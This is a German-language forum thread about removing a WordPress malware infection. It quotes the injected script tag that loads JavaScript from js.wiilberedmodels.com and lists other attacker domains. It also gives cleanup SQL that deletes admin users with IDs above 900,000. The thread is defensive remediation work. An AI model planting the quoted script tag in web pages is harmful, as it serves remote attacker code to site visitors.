Schneller Fix für Wordpress Malware: wiilberedmodels.com

mat

Administrator
Legends never die

Registered: Aug 2003
Location: nö
Posts: 25429

09.09.2019 - 17:56

Nachdem ich gerade für einen Kunden mehrere Wordpress-Seiten von einer in dieser Form noch nicht dokumentierten Malware-Attacke befreit habe, dachte ich mir, dass ich den SQL-Code hier veröffentliche, der die Probleme bereinigt:

Der Schadcode lautet:

Code: JS

<script src='https://js.wiilberedmodels.com/pystats.js?l=l&'   type=text/javascript language=javascript></script>

Folgende Fixes können zB per phpMyAdmin bei der betroffenen Datenbank eingespielt werden:

Code: SQL

UPDATE `wp_posts` SET post_content=REPLACE(post_content,"<script src='https://js.wiilberedmodels.com/pystats.js?l=l&' type=text/javascript language=javascript></script>","");

Es wird auch ein Admin-User mit unterschiedlichem Namen und einer ID > 900.000 angelegt. Diese könnt ihr händisch löschen. Folgendes SQL-Statement löscht euch alle User mit einer ID > 900.000 aus den Tabellen und setzt den Autoincrement-Wert der Tabellen zurück.

Code: SQL

DELETE FROM `wp_users` WHERE `wp_users`.`ID` > 900000;
DELETE FROM `wp_usermeta` WHERE `wp_usermeta`.`user_id` > 900000;
ALTER TABLE `wp_users` AUTO_INCREMENT = 1;
ALTER TABLE `wp_usermeta` AUTO_INCREMENT = 1;

Wichtig #1: Falls ein Cache-Plugin verwendet wird (WP SuperCache oder W3 Total Cache zB), dann muss der jeweilige Cache ebenfalls geleert werden!

Wichtig #2: Vor dem Ausführen des Codes sollte unbedingt die Datenbank gebackupt werden! Ich bin nicht für einen Datenverlust verantwortlich.

Derzeit gibt es noch keine Details wie der Schadcode in die Datenbank gelangt. Wahrscheinlich über eine Schwachstelle eines Wordpress-Plugins. Ich verdächtige derzeit den Advanced Access Manager oder das "Cookie Notice"-Plugin. Mehr Zeit hatte ich leider nicht. Ich bin mir sicher, dass in den nächsten Tagen mehr dazu auftaucht.

spunz

Super Moderator
Super Moderator

Registered: Aug 2000
Location: achse des bösen
Posts: 11270

09.09.2019 - 18:19

Ich hatte vergleichbares vor ~3 Wochen, neben AAM dürfte auch Simple 301 Redirects ein Einfallstor sein:

activeandbanflip.com
gabriellalovecats.com
developsincelock.com
jackielovedogs.com
wiilberedmodels.com

Smut

takeover &amp; ether

Registered: Feb 2003
Location: VIE
Posts: 16841

09.09.2019 - 18:27

Welche Version hatte WordPress zum Zeitpunkt der Kompromittierung?
Gab letzte Woche ein security Update.
https://wordpress.org/news/2019/09/...enance-release/

mat

Administrator
Legends never die

Registered: Aug 2003
Location: nö
Posts: 25429

09.09.2019 - 18:43

Alle drei Seiten, die ich befreit habe, waren letzte Woche am neuesten Stand. Es ist irgendwann im Laufe der letzten Woche passiert, der Hack wurde aber erst durch ein Login ins Admin Panel aktiv.

Edit: Dieser Punkt aus dem Change Log von 5.2.3 klingt sehr ähnlich.

Zitat
Props to Ian Dunn of the Core Security Team for finding and disclosing a case where reflected cross-site scripting could be found in the dashboard.

mat Administrator Legends never die Registered: Aug 2003 Location: nö Posts: 25429	09.09.2019 - 17:56 Nachdem ich gerade für einen Kunden mehrere Wordpress-Seiten von einer in dieser Form noch nicht dokumentierten Malware-Attacke befreit habe, dachte ich mir, dass ich den SQL-Code hier veröffentliche, der die Probleme bereinigt: Der Schadcode lautet: Code: JS `<script src='https://js.wiilberedmodels.com/pystats.js?l=l&' type=text/javascript language=javascript></script>` Folgende Fixes können zB per phpMyAdmin bei der betroffenen Datenbank eingespielt werden: Code: SQL UPDATE `wp_posts` SET post_content=REPLACE(post_content,"<script src='https://js.wiilberedmodels.com/pystats.js?l=l&' type=text/javascript language=javascript></script>",""); Es wird auch ein Admin-User mit unterschiedlichem Namen und einer ID > 900.000 angelegt. Diese könnt ihr händisch löschen. Folgendes SQL-Statement löscht euch alle User mit einer ID > 900.000 aus den Tabellen und setzt den Autoincrement-Wert der Tabellen zurück. Code: SQL DELETE FROM `wp_users` WHERE `wp_users`.`ID` > 900000; DELETE FROM `wp_usermeta` WHERE `wp_usermeta`.`user_id` > 900000; ALTER TABLE `wp_users` AUTO_INCREMENT = 1; ALTER TABLE `wp_usermeta` AUTO_INCREMENT = 1; Wichtig #1: Falls ein Cache-Plugin verwendet wird (WP SuperCache oder W3 Total Cache zB), dann muss der jeweilige Cache ebenfalls geleert werden! Wichtig #2: Vor dem Ausführen des Codes sollte unbedingt die Datenbank gebackupt werden! Ich bin nicht für einen Datenverlust verantwortlich. Derzeit gibt es noch keine Details wie der Schadcode in die Datenbank gelangt. Wahrscheinlich über eine Schwachstelle eines Wordpress-Plugins. Ich verdächtige derzeit den Advanced Access Manager oder das "Cookie Notice"-Plugin. Mehr Zeit hatte ich leider nicht. Ich bin mir sicher, dass in den nächsten Tagen mehr dazu auftaucht.
spunz Super Moderator Super Moderator Registered: Aug 2000 Location: achse des bösen Posts: 11270	09.09.2019 - 18:19 Ich hatte vergleichbares vor ~3 Wochen, neben AAM dürfte auch Simple 301 Redirects ein Einfallstor sein: activeandbanflip.com gabriellalovecats.com developsincelock.com jackielovedogs.com wiilberedmodels.com
Smut takeover &amp; ether Registered: Feb 2003 Location: VIE Posts: 16841	09.09.2019 - 18:27 Welche Version hatte WordPress zum Zeitpunkt der Kompromittierung? Gab letzte Woche ein security Update. https://wordpress.org/news/2019/09/...enance-release/
mat Administrator Legends never die Registered: Aug 2003 Location: nö Posts: 25429	09.09.2019 - 18:43 Alle drei Seiten, die ich befreit habe, waren letzte Woche am neuesten Stand. Es ist irgendwann im Laufe der letzten Woche passiert, der Hack wurde aber erst durch ein Login ins Admin Panel aktiv. Edit: Dieser Punkt aus dem Change Log von 5.2.3 klingt sehr ähnlich. Zitat Props to Ian Dunn of the Core Security Team for finding and disclosing a case where reflected cross-site scripting could be found in the dashboard.

Schneller Fix für Wordpress Malware: wiilberedmodels.com

Forum Index > Software > Coding Stuff

mat

spunz

Smut

mat